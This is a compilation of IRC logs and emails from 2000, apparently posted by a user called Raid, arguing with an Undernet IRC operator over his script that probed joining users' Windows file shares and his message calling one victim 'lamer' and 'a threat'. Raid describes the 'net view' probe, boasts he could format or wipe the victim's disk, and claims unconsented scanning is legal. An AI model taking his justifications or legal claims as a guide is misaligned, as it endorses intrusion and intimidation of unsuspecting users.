<Raid> His computer isn't setup properly.
<Raid> His entire c: drive is wide open to anybody; even you.
<CiCi> ok, let me go read these logs again with that in mind, brb
<Raid> So when I'm contacted by the authorities, (they already know about this serious
security problem.. ) they'll probably get a chuckle out of it. As I told chaplain he had
this problem, if I was a jerk; I wouldn't have said a word.. just done mean things to him.
<Raid> thanks.
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.[13:29] (Raid): LC: So consider
that a threat, lamer.
<Raid> Are you going to use the entire log, or out of context?
<Raid> I have no need to threaten CiCi. I could have kept my mouth shut.
<Raid> then anybody (even you) could access his entire system.
<Raid> and use it like you were sitting at the keyboard.
<Raid> I thought he might like to know about it.
<Raid> Next time I find somebody has this problem... shrug, I'll just keep quiet. I had no
idea you didn't know about this serious problem with windows machines.
<Raid> NT suffers from it as well.
<Raid> in fact, everytime you reboot; unless you manually set it otherwise, drive c: is
shared as open, with admin rights, no password.
<Raid> listen, if you really don't believe me, You can ask anybody you trust with computer
knowledge to checkout this log of our chat.
<Raid> I'm not bsing you.
<Raid> I was trying to save you some shame is all.
<Raid> (My boss thought it was funny as hell.)
<CiCi> you were trying to save me from shame?
<CiCi> heh
<Raid> erm, embarrasment rather
<Raid> it's not normal for an admin to not understand shared drives. ;p
<Raid> and you are an administrator. hehe
<CiCi> if your boss had a copy of your logs I don't think he'd think your actions were funny
<Raid> Admins are supposed to know these things, and if they don't check it out first.
<Raid> Actually, he was standing beside me the entire convo; including the one with chaplain.
<CiCi> if you were trying to help, that's one thing, but you were threatening and that's not
right
<Raid> He didn't believe me when I told him YOU were an ircop of undernet.
<CiCi> if you recall, you tried that same mess on me when you first met me
<Raid> I had to /whois and show him your "is an ircop" thingie.
<Raid> Listen, I had access to his computer, why threaten? Nothing he could do at that
point. he was mine for the kill if I wanted it.
<Raid> Instead, I told him he had a problem.
<Raid> and explained (which you did take out of context) that if I was a jerk, I could
easily format /u his hard disk, or even quicker, nuke his fat or registry.
<CiCi> why were you looking anyway?
<Raid> oh and btw, I'm not a teenager; or a script kiddy, I don't have any reason to bs you.
I'm perfectly capable of backing up what I say.
<Raid> I wasn't.
<Raid> My script autoscans people on joins, much like undernet does for open proxies.
<Raid> You might want to recommend undernet do this scan hehe
<Raid> it's even more serious to a users data then an open proxy.
<CiCi> uhm no
<CiCi> undernet isn't a nanny service
<Raid> Shrug, as I said... if you don't know about something, Check it out before accusing
me of doing something bad. I've been clean for almost 8 months. Haven't hacked a single thing.
<CiCi> the only things we look for are things that damage this network on a large scale
<CiCi> the admins would NEVER agree to such scans as yours done to all guests
<Raid> if they all knew about the bug in windows, I bet you they would.
<CiCi> now, I"m tired of you insulting me
<Raid> I'm sure some of you ircops login with windows boxes.
<Raid> I'm not trying to insult you.
<Raid> Actually I find you one of the cooler ircops i've talked too.
<Raid> I realize I may sound like a smartass; But it's seriously not intentional.
<Raid> I simply want to resolve this issue with you.
<Raid> I'm not worried about the authorities.
<Raid> I just don't like people thinking I've done something i didn't is all.
<CiCi> you scanned someone's machine and then said
<CiCi> [13:29] (Raid): LC: So consider that a threat, lamer.
<Raid> My script scanned him when he joined.
<CiCi> I haven't changed my opinion of your immature behavior
<Raid> hmmm
<CiCi> if you honestly wanted to help people by doing this, you wouldn't call them lamers
<Raid> Did you get the entire log, or just what I said to him?
<CiCi> do you have any clue what percentage of our undernet guests I could call lamers?
<Raid> IE: the first thing he said to me?
<CiCi> alot of them, but I don't
<Raid> I was minding my own business, he smarted off. I decided to tell him in open channel
(I was writing /msg to him) that he had a problem.
<CiCi> perhaps a lack of communication skills is the problem, I don't now, but I do know
that what you did was not good
<Raid> If I was immature as you seem to think, I'd have chewed his hard disk up right before
his eyes, and said nothing.
<CiCi> *shrug*
<CiCi> ahhh so he "smarted off" so you thought you'd put him in his place? that's typically
something a kid does
<Raid> a kid?
<Raid> No mam, A kid would have formatted him the second they were told an open share was
found.
<Raid> or stolen data or something.
<Raid> I told him about it, and since he was being a wiseass; I told everybody in the process.
<CiCi> pftt
<CiCi> that was very nice of you...... not
<CiCi> and that's my point
<Raid> would it have been nicer not to tell him?
<Raid> so somebody WITH the intention of harm could take advantage?
<CiCi> would have been more civil if you hadn't tried to act l33t with him
<Raid> I didn't try to act l33t.
<CiCi> and because you decided to show off and make a fool of someone, you made a mess
<Raid> I made no such mess, A misunderstanding of what exactly I did made a mess.
<Raid> Chaplain I bet didn't mention we go way back did he?
<Raid> I didn't show off, I already had the blasted privmsg typed... He decided to be a wise
one... So I cancelled it, and wrote a new one.
<CiCi> alot of people can hack, most of us don't, and most of us are mature enough not to
have a temper fit and announce a problem
<CiCi> enough
<Raid> Alright, fine. You don't believe me.. That's perfectly ok. All you need to do is
check ANY search engine (or even micrsoft) for the fix for this problem.
<Raid> they'll even tell you it's not a hack.
<Raid> it's a bug.
<CiCi> most invasions are bugs
<Raid> erm, I didn't invade him. Script checked for open shares, didn't establish connection
or map anything.
<Raid> it's no more intrusive then proxy scans. Users don't even notice it, and it doesn't
show up as an attack on any firewalls either; because it isnt.
<CiCi> *sigh* I'm finished with this now, you're wrong to threaten people, end of story
<Raid> ugh... Well, checkout what I said if you get a chance.
<Raid> and goodnight n stuff.
Add Addresses
<CiCi> why?
<Raid> I don't think you quiet understand what you
erm, reported me for. heh
<Raid> Mr chaplain had open shared drives. I didn't do
anything to him, I told him it was there; I even
directed him to a website for zone alarm. (firewall;
fixes that problem)
<Raid> I told him if I was a jerk as he said, I would
have formatted him.
<Raid> I didn't do so. hehe
<Raid> I didn't "hack" him or anything.
<Raid> His computer isn't setup properly.
<Raid> His entire c: drive is wide open to anybody;
even you.
<CiCi> ok, let me go read these logs again with that
in mind, brb
<Raid> So when I'm contacted by the authorities, (they
already know about this serious security problem.. )
they'll probably get a chuckle out of it. As I told
chaplain he had this problem, if I was a jerk; I
wouldn't have said a word.. just done mean things to
him.
<Raid> thanks.
<CiCi> [13:29] (Raid): LC: So consider that a threat,
lamer.[13:29] (Raid): LC: So consider that a threat,
lamer.
<Raid> Are you going to use the entire log, or out of
context?
<Raid> I have no need to threaten CiCi. I could have
kept my mouth shut.
<Raid> then anybody (even you) could access his entire
system.
<Raid> and use it like you were sitting at the
keyboard.
<Raid> I thought he might like to know about it.
<Raid> Next time I find somebody has this problem...
shrug, I'll just keep quiet. I had no idea you didn't
know about this serious problem with windows machines.
<Raid> NT suffers from it as well.
<Raid> in fact, everytime you reboot; unless you
manually set it otherwise, drive c: is shared as open,
with admin rights, no password.
<Raid> listen, if you really don't believe me, You can
ask anybody you trust with computer knowledge to
checkout this log of our chat.
<Raid> I'm not bsing you.
<Raid> I was trying to save you some shame is all.
<Raid> (My boss thought it was funny as hell.)
<CiCi> you were trying to save me from shame?
<CiCi> heh
<Raid> erm, embarrasment rather
<Raid> it's not normal for an admin to not understand
shared drives. ;p
<Raid> and you are an administrator. hehe
<CiCi> if your boss had a copy of your logs I don't
think he'd think your actions were funny
<Raid> Admins are supposed to know these things, and
if they don't check it out first.
<Raid> Actually, he was standing beside me the entire
convo; including the one with chaplain.
<CiCi> if you were trying to help, that's one thing,
but you were threatening and that's not right
<Raid> He didn't believe me when I told him YOU were
an ircop of undernet.
<CiCi> if you recall, you tried that same mess on me
when you first met me
<Raid> I had to /whois and show him your "is an ircop"
thingie.
<Raid> Listen, I had access to his computer, why
threaten? Nothing he could do at that point. he was
mine for the kill if I wanted it.
<Raid> Instead, I told him he had a problem.
<Raid> and explained (which you did take out of
context) that if I was a jerk, I could easily format
/u his hard disk, or even quicker, nuke his fat or
registry.
<CiCi> why were you looking anyway?
<Raid> oh and btw, I'm not a teenager; or a script
kiddy, I don't have any reason to bs you. I'm
perfectly capable of backing up what I say.
<Raid> I wasn't.
<Raid> My script autoscans people on joins, much like
undernet does for open proxies.
<Raid> You might want to recommend undernet do this
scan hehe
<Raid> it's even more serious to a users data then an
open proxy.
<CiCi> uhm no
<CiCi> undernet isn't a nanny service
<Raid> Shrug, as I said... if you don't know about
something, Check it out before accusing me of doing
something bad. I've been clean for almost 8 months.
Haven't hacked a single thing.
<CiCi> the only things we look for are things that
damage this network on a large scale
<CiCi> the admins would NEVER agree to such scans as
yours done to all guests
<Raid> if they all knew about the bug in windows, I
bet you they would.
<CiCi> now, I"m tired of you insulting me
<Raid> I'm sure some of you ircops login with windows
boxes.
<Raid> I'm not trying to insult you.
<Raid> Actually I find you one of the cooler ircops
i've talked too.
<Raid> I realize I may sound like a smartass; But it's
seriously not intentional.
<Raid> I simply want to resolve this issue with you.
<Raid> I'm not worried about the authorities.
<Raid> I just don't like people thinking I've done
something i didn't is all.
<CiCi> you scanned someone's machine and then said
<CiCi> [13:29] (Raid): LC: So consider that a threat,
lamer.
<Raid> My script scanned him when he joined.
<CiCi> I haven't changed my opinion of your immature
behavior
<Raid> hmmm
<CiCi> if you honestly wanted to help people by doing
this, you wouldn't call them lamers
<Raid> Did you get the entire log, or just what I said
to him?
<CiCi> do you have any clue what percentage of our
undernet guests I could call lamers?
<Raid> IE: the first thing he said to me?
<CiCi> alot of them, but I don't
<Raid> I was minding my own business, he smarted off.
I decided to tell him in open channel (I was writing
/msg to him) that he had a problem.
<CiCi> perhaps a lack of communication skills is the
problem, I don't now, but I do know that what you did
was not good
<Raid> If I was immature as you seem to think, I'd
have chewed his hard disk up right before his eyes,
and said nothing.
<CiCi> *shrug*
<CiCi> ahhh so he "smarted off" so you thought you'd
put him in his place? that's typically something a
kid does
<Raid> a kid?
<Raid> No mam, A kid would have formatted him the
second they were told an open share was found.
<Raid> or stolen data or something.
<Raid> I told him about it, and since he was being a
wiseass; I told everybody in the process.
<CiCi> pftt
<CiCi> that was very nice of you...... not
<CiCi> and that's my point
<Raid> would it have been nicer not to tell him?
<Raid> so somebody WITH the intention of harm could
take advantage?
<CiCi> would have been more civil if you hadn't tried
to act l33t with him
<Raid> I didn't try to act l33t.
<CiCi> and because you decided to show off and make a
fool of someone, you made a mess
<Raid> I made no such mess, A misunderstanding of what
exactly I did made a mess.
<Raid> Chaplain I bet didn't mention we go way back
did he?
<Raid> I didn't show off, I already had the blasted
privmsg typed... He decided to be a wise one... So I
cancelled it, and wrote a new one.
<CiCi> alot of people can hack, most of us don't, and
most of us are mature enough not to have a temper fit
and announce a problem
<CiCi> enough
<Raid> Alright, fine. You don't believe me.. That's
perfectly ok. All you need to do is check ANY search
engine (or even micrsoft) for the fix for this
problem.
<Raid> they'll even tell you it's not a hack.
<Raid> it's a bug.
<CiCi> most invasions are bugs
<Raid> erm, I didn't invade him. Script checked for
open shares, didn't establish connection or map
anything.
<Raid> it's no more intrusive then proxy scans. Users
don't even notice it, and it doesn't show up as an
attack on any firewalls either; because it isnt.
<CiCi> *sigh* I'm finished with this now, you're wrong
to threaten people, end of story
<Raid> ugh... Well, checkout what I said if you get a
chance.
<Raid> and goodnight n stuff.
Add
Addresses
You were removed because you were actively scanning others machines as
they
joined the channel, invading those machines when possible, and pasting
their private chat logs back to them. You have been asked to stop
doing
this for over 24 hours and the requests were met with an attitude from
you
that you were very much entitled to invade and compromise machines when
someone irritated you on Undernet. Don't think for one minute that this
is
either legal or appreciated using Undernet bandwidth. If this is
repeated
by you when your gline expires, expect another one.
Ci_Ci
Admin. Dallas.TX.US.Undernet.Org
Add Addresses
Add
Addresses
> with an attitude from you that you were very much >
entitled to invade and compromise machines when
I've also heard from others (and I'm sure they have
logs) that you've been abusing your Oline for some
time now. glining people for channel matters; Of which
you have no status in. Just because you "hangout" in a
channel doesn't give you the right to gline people
from the entire undernet; Thats what the channel has
ops for.
__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/
> Gator
Add
Addresses
Then explain how you were pasting back private chat logs that Chaplain
had
with others :/ When I first chatted with you about this, you told me
you
wouldn't have done anything to him but because he was a smart alec, or
something of that nature, you thought you were within your right to do
this. Just because you CAN hit a child doesn't mean it's the proper
thing
to do and most of our undernet guests are virtual children. We don't
take
advantage of that fact.
>
>Not true. You said in channel that I was hacking (I
>have that log too) chaplain.
I'm not Chaplain. Get your people straight. There is more than one
person
here who has been effected by your actions and AFAIK Chaplain isn't
reading
this email.
I told you nothing of the sort. Once again, get your people straight.
It is
my understanding that Chaplain has contacted his church's attorney and
that
since you both live in the same state, there is merit for suit. That's
all
I know about that and that's all I want to know about it.
>
>Real network aware one you are... I wasn't using
>undernet bandwidth running my script...And what my
>script was doing is damn sure not illegal. Unless your
>going to tell me undernets proxy scans of me everytime
>I connect is also illegal? I didn't do anything
>different.
OK, if you weren't using undernet bandwidth, explain how you knew the
IP/host information of the people you were scanning. You were scanning
everyone that entered a channel on Undernet without their consent. The
"consent" part is the difference between your scans and the proxy scans
Undernet does. If you read the motd of most servers, you'll see that it
is
discussed there. If users don't want to be scanned for the most
commonly
abused ports being open, they are free to disconnect to Undernet. You
made
none of this information available to people who entered the channel
and
you had no permission from them to scan their machines.
Calling someone a lamer doesn't sound like my idea of nice and telling
them
to "consider this a threat" doesn't sound very kind either.
I don't have a personal problem with you so the rest of the above
paragraph
is of no concern. My problem with you was that you were sitting on
Undernet
scanning the machines of each person joining a channel.
>Not to
>mention the fellow you glined last night for swearing
>in a channel you don't even op in. I've got that log
>too ;p
>
>I've also heard from others (and I'm sure they have
>logs) that you've been abusing your Oline for some
>time now. glining people for channel matters; Of which
>you have no status in. Just because you "hangout" in a
>channel doesn't give you the right to gline people
>from the entire undernet; Thats what the channel has
>ops for.
>
I've carbon copied him on this as well. Gator is a very good person
and
does many things for Undernet that he never gets praise he deserves.
What
you may not be aware of is that both Gator and I got copies of
Chaplians
log files sent to abuse the day before. We both have access to the chat
long in full context. We both read email sent to abuse@undernet.org
>
>The log file is kinda large; scroll down for the
>relevant info.
Many of us who work on the net do not open attachments for obvious
reasons.
I'm sure there is nothing malicious in your logs, but it's just a rule
of
thumb we use to avoid problems.
The reason I got involved in this was because you were not only
scanning
people without permission as they entered that channel, but also
because
you were using the information from those scans to threaten people when
they did not behave in the manner you desired. If you have indeed
stopped
scanning people as they enter a channel, you have solved the problem
that
was my issue.
CiCi
From John Grahms Sun Sep 10 20:58:49 2000
Received:
from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10
Sep 2000 20:58:49 PDT
Date:
Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
From:
John Grahms <raidslam@yahoo.com> | Block address
Subject:
Re: [Abuse] Hello
To:
"L. Maurer" <lmaurer@iadfw.net>
MIME-Version:
1.0
Content-Type:
text/plain; charset=us-ascii
Content-Length:
10980
Add Addresses
> Then explain how you were pasting back private chat
> logs that Chaplain had with others :/ When I first
You care to back this up with some Evidence CiCi? Any
logs created by my machine are available for my use;
You don't have any say with that I do with material I
log. You don't own not one single file present on my
machine, and that includes logs of us chatting. I log
for a reason, and this my dear is one of them.
> this, you told me you wouldn't have done anything to
> him but because he was a smart alec, or something of
> that nature, you thought you were within your right
> to do this.
> I told you nothing of the sort. Once again, get your
> people straight.
> My problem with you was that you were sitting on >
Undernet scanning the machines of each person joining
> a channel.
> Once again, scanning for open ports and then >
intimidating the machine owner when they say >
something you dislike borders on extortion and it's
I didn't scan for open ports. Computer lesson number 2
(seems you can't learn any other way, I am forced to
be rude) my script sent net view ''$ip one time, which
attempts to connect to port 139; For Netbios
information, NOT OOB nuking. I already know this is
above you, But I'm going to explain exactly what I did
anyway; Just because it's beyond you doesn't mean
somebody else reading this email won't understand what
I'm talking about.
CiCi, You know your gline was not legit. You know it.
I know it. Why don't you apologize for doing it? It
seems like a christian thing to do.
> but also because you were using the information from
> those scans to threaten people when they did not >
behave in the manner you desired.
Regards,
Raid
__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/
Add
Addresses
Here's a copy of this kid's latest crap. I've had enough of this.
Sitting
in a channel and port scanning everyone who joins is not a good thing.
Continuing his arguement with me about it is totally stupid.
Lisa
>X-Persona: <lmaurer>
>Return-Path: <raidslam@yahoo.com>
>Received: from web1603.mail.yahoo.com from [128.11.23.203] by
mail.airmail.net
> (/\##/\ Smail3.1.30.16 #30.438) with smtp for <lmaurer@iadfw.net>
sender:
<raidslam@yahoo.com>
> id <mP/13YKWp-0008GIP@mail.airmail.net>; Sun, 10 Sep 2000 22:45:07
-0500
(CDT)
>Received: (qmail 26157 invoked by uid 60001); 11 Sep 2000 03:58:49
-0000
>Message-ID: <20000911035849.26156.qmail@web1603.mail.yahoo.com>
>Received: from [205.245.105.248] by web1603.mail.yahoo.com; Sun, 10
Sep
2000 20:58:49 PDT
>Date: Sun, 10 Sep 2000 20:58:49 -0700 (PDT)
>From: John Grahms <raidslam@yahoo.com>
>Subject: Re: [Abuse] Hello
>To: "L. Maurer" <lmaurer@iadfw.net>
>MIME-Version: 1.0
>Content-Type: text/plain; charset=us-ascii
>X-Airmail-Delivered: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>X-Airmail-Spooled: Sun, 10 Sep 2000 22:45:07 -0500 (CDT)
>
>
>--- "L. Maurer" <lmaurer@iadfw.net> wrote:
>
>> Then explain how you were pasting back private chat
>> logs that Chaplain had with others :/ When I first
>You care to back this up with some Evidence CiCi? Any
>logs created by my machine are available for my use;
>You don't have any say with that I do with material I
>log. You don't own not one single file present on my
>machine, and that includes logs of us chatting. I log
>for a reason, and this my dear is one of them.
>
>> this, you told me you wouldn't have done anything to
>> him but because he was a smart alec, or something of
>> that nature, you thought you were within your right
>> to do this.
>
>You can't tell me "don't be a smartass" to someone,
>Sorry. It's not illegal nor against undernet policy to
>treat somebody with less then perfect respect. Go
>nanny somebody else.
>
>> Just because you CAN hit a child doesn't mean
>> it's the proper thing to do and most of our
>undernet > guests are virtual children. We don't take
>advantage > of that fact.
>
>I didn't hit anybody. And I'm getting pretty sick and
>tired of your bullshit excuses CiCi. Admit it, You
>don't like me, so You gline me.
>
>> I'm not Chaplain. Get your people straight. There
>> is more than one person here who has been effected
>> by your actions and AFAIK Chaplain isn't reading
>> this email.
>
>You wanna back this one up as well Please? I like
>evidence, I'm a strong believer in it. The more BS you
>talk (which btw, you can't actually backup) the less
>respect I have for you.
>
>> I told you nothing of the sort. Once again, get your
>> people straight.
>
>OH YES, Yes you did. I have that Log at work; I shall
>retrieve it. You made it perfectly clear in your own
>words that I had been reported (laugh laugh) to the
>authorities for my "hacking" chaplain.
>
>> It is my understanding that Chaplain has contacted >
>his church's attorney and that since you both live >
>in the same state, there is merit for suit.
>
>Cici, I've been as patient and forgiving as I'm going
>to be. The rest of this email may be rude; I'm not
>trying any longer to make it not be. Had you looked at
>all on the laws governing this state; Chaplain hasn't
>got a pot to piss in. However, I can and will win a
>counter suit; Although I know churches don't have alot
>of money, I'll counter sue for the point of it.
>> OK, if you weren't using undernet bandwidth, explain
>> how you knew the IP/host information of the people
>*yawn* Remember when I said I had lost my patience?
>Well, get ready for a computer lesson; Seems damn time
>somebody told you. It doesn't use undernet bandwidth
>to /whois someone, nor does it really do anything when
>you /dns somebody. My script didn't use any of your
>precious bandwidth, because (oh dense one) it
>establishes direct connection via a socket call. Shall
>I get any more technical, or can you understand this?
>
>
>> their consent. The
>> "consent" part is the difference between your scans
>> and the proxy scans Undernet does. If you read the >
>motd of most servers, you'll see that it is discussed
>> there.
>
>Indeed I have, and guess what. If somebody really
>wanted to "sue" undernet for scanning them, your motd
>wouldn't do shit for you. Know why? Because it's like
>a shrinkwrap software license; It won't actually hold
>up in court. But it sounds good.
>
>
>> to Undernet. You made
>> none of this information available to people who
>> entered the channel and you had no permission from >
>them to scan their machines.
>
>Technically, I didn't scan anybody. Second, I don't
>actually need their permission to scan them. It's not
>illegal to port scan any machine you desire. It
>becomes illegal if you attempt to gain unauthorized
>entry into the machine once you have scanned It.
>scanning is like knocking on the door or calling
>somebodys house to see if there home. For an ircop,
>You really don't know much about the internet, nor the
>laws gonverning it.
>
>> Calling someone a lamer doesn't sound like my idea
>> of nice and telling them to "consider this a
>threat" > doesn't sound very kind either.
>
>Still quoting me out of context? :) Why don't you
>email us a copy of the entire log cici, so we can put
>it in the proper context. I was nice enough to tell
>him he had a problem to begin with; You seem to have a
>very hard time with this very very simple concept. I
>really don't know what to think of you anymore. I
>already know your computer knowledge leaves much to be
>desired, and in my opinion; You aren't qualified to be
>an ircop.
>
>But lucky for you, It's not in my power to make those
>decisions.
>
>> I don't have a personal problem with you so the rest
>> of the above paragraph is of no concern.
>
>I'm not letting you wiggle out of this CiCi. Glining
>me went a little too far. According to the wonderful
>christian log, You glined me after I had already told
>you (after your attempt to start shit with me when I
>joined) that the script was no longer scanning
>anybody. I set away to get some food, then you glined
>me. You can't get out of it. That's how it went down,
>and you know it.
>
>
>> My problem with you was that you were sitting on >
>Undernet scanning the machines of each person joining
>> a channel.
>
>I'm an op in several security related channels, It is
>our channels policy to scan all visitors; or they are
>not welcome. My script does not currently distinquish
>between only those channels and all channels I might
>be visiting in. However, it is to be said; You and
>Chaplain are the ONLY people I've scanned and informed
>they had a problem that weren't happy to know. They
>say I suppose that ignorance is bliss, but in the
>computer age; this will kill you.
>
>Your problem with me is a personal one, Otherwise you
>would not have glined me yesterday; As you knew well
>infact that I was no longer scanning anybody (As I had
>told you). How do you defend that gline anyway CiCi?
>What undernet rule at the time was I in violation of?
>Please, enlighten me :)
>
>> I was told yesterday that I had been accepted as an
>> Op in #christian.
>
>I don't know. I was speaking with the channel
>administrator; He assured me I'd have no further
>problems from you. :) Whether your op status is
>affected isn't my concern, I just don't want any more
>hassle from you. I know you've overstepped your
>authority, and you know it.
>
>> I have now declined that offer until this matter is
>> settled.
>
>The matter can easily be settled, Don't gline me for
>bullshit, and apologize for the bullshit gline you did
>set on me, and I'll drop the entire issue.
>
>> Once again, scanning for open ports and then >
>intimidating the machine owner when they say >
>something you dislike borders on extortion and it's
>I didn't scan for open ports. Computer lesson number 2
>(seems you can't learn any other way, I am forced to
>be rude) my script sent net view ''$ip one time, which
>attempts to connect to port 139; For Netbios
>information, NOT OOB nuking. I already know this is
>above you, But I'm going to explain exactly what I did
>anyway; Just because it's beyond you doesn't mean
>somebody else reading this email won't understand what
>I'm talking about.
>
>And again, I must ask you to provide proof that I was
>intimidating anybody. Sigh, I lose more and more
>respect for you with each email me thinks. I don't
>extort anybody.
>
>> If you weren't on undernet, you wouldn't know who >
>joined the channels here.
>
>I've been a regular on undernet for several years.
>I've never had a problem like this before. And it's
>not really a problem... You had no valid reason to
>gline me, and you did; And I'm going to press this
>issue until it's resolved. If that means I have to
>make you look like a total idiot with regard to
>computers, I'll do so (mind you, it wouldn't take any
>effort; These emails and the logs I have show it
>without a doubt). A wrong must be righted.
>
>CiCi, You know your gline was not legit. You know it.
>I know it. Why don't you apologize for doing it? It
>seems like a christian thing to do.
>
>> I've carbon copied him on this as well. Gator is a
>> very good person and does many things for Undernet >
>that he never gets praise he deserves.
>
>I've known gator for sometime, he knows some
>associates I used to frequent with. WarBlade and
>crew...
>
>> What you may not be aware of is that both Gator
>and > I got copies of Chaplians log files sent to
>abuse > the day before. We both have access to the
>chat
>
>Then why are you still quoting it out of context? I
>didn't do anything illegal to Chaplain; I may have
>saved him some serious downtime. I do admit tho, If I
>had known I'd be in this BS for doing it, I'd have not
>said not one word. In the future, I'll keep my mouth
>shut. Ignorance is bliss, right? :)
>
>
>
>
>> Many of us who work on the net do not open
>> attachments for obvious reasons.
>
>A LOG file is a text file, opening it in notepad will
>not infect you. Please don't force me to give you a
>lesson in virus terminology. I have very good
>withstanding creditials in that field. How many
>"scriptkiddys" (thats what you called me once right?
>;p) do you know in Rolling Stone magazine? :-)
>
>> I'm sure there is nothing malicious in your logs,
>> but it's just a rule of thumb we use to avoid
>>problems.
>
>Lack of education creates rules that are sometimes not
>necessary.
>
>> The reason I got involved in this was because you
>> were not only scanning people without permission as
>> they entered that channel
>
>(a) I don't need their permission. and (b) I don't
>even have to tell them either beforehand or after that
>I scanned them. And I don't scan people.
>
>> but also because you were using the information from
>> those scans to threaten people when they did not >
>behave in the manner you desired.
>
>Nice try! I didn't threaten anybody; I helped his
>sorry ass out. I didn't use any of the information in
>any illegal nor immoral manner. I did a christian
>thing a told the bastard he had a problem. I should
>have let him suffer with it. Stupidty seems to be
>uncurable.
>
>> If you have indeed stopped
>> scanning people as they enter a channel, you have
>> solved the problem that was my issue.
>
>Your "issue" isn't of any concern to me anymore. Your
>gline and abuse of oline is. You glined me after I
>already told you I stopped, thats just plain outright
>wrong. I wasn't doing anything against undernet policy
>to begin with, but to gline me after I already said I
>wasn't doing it anymore is bullshit. Espicially since
>you didn't gline me on entry, you said a wiseass
>comment about me in open channel. When I responded I
>was glined shortly there after. And I bet without a
>doubt; it had nothing whatsoever to do with chaplain.
>I strongly suspect you didn't like my response to your
>wiseass comment.
>
>If theres a lesson to be learned here, it's to allow
>the stupid and ignorant to remain that way; It's for
>the best.
>
>Regards,
>Raid
>
>PS: I didn't have time to enter gators email; I'm
>trusting you to send him this intact... See if you can
>do that. Ok?
>
>
>__________________________________________________
>Do You Yahoo!?
>Yahoo! Mail - Free email you can access from anywhere!
>http://mail.yahoo.com/
>
From John Grahms Mon Sep 11 05:51:48 2000
Received:
from [205.245.105.248] by web1609.mail.yahoo.com; Mon, 11
Sep 2000 05:51:48 PDT
Date:
Mon, 11 Sep 2000 05:51:48 -0700 (PDT)
From:
John Grahms <raidslam@yahoo.com> | Block address
Subject:
Re: [Abuse] Hello
To:
"L. Maurer" <lmaurer@iadfw.net>
MIME-Version:
1.0
Content-Type:
text/plain; charset=us-ascii
Content-Length:
813
Add Addresses
Regards,
Raid
Add
Addresses
Hi Lisa,
Regards,
Raid
__________________________________________________
Do You Yahoo!?
Yahoo! Mail - Free email you can access from anywhere!
http://mail.yahoo.com/
-- I don't remember when this took place or how it really fits into my
article. LoL. Ah well.
These text files comprise the war with Undernet IRCop CiCi
so far. As you can see by reading the files yourself, She isn't
qualified for her position. She be way too dumb.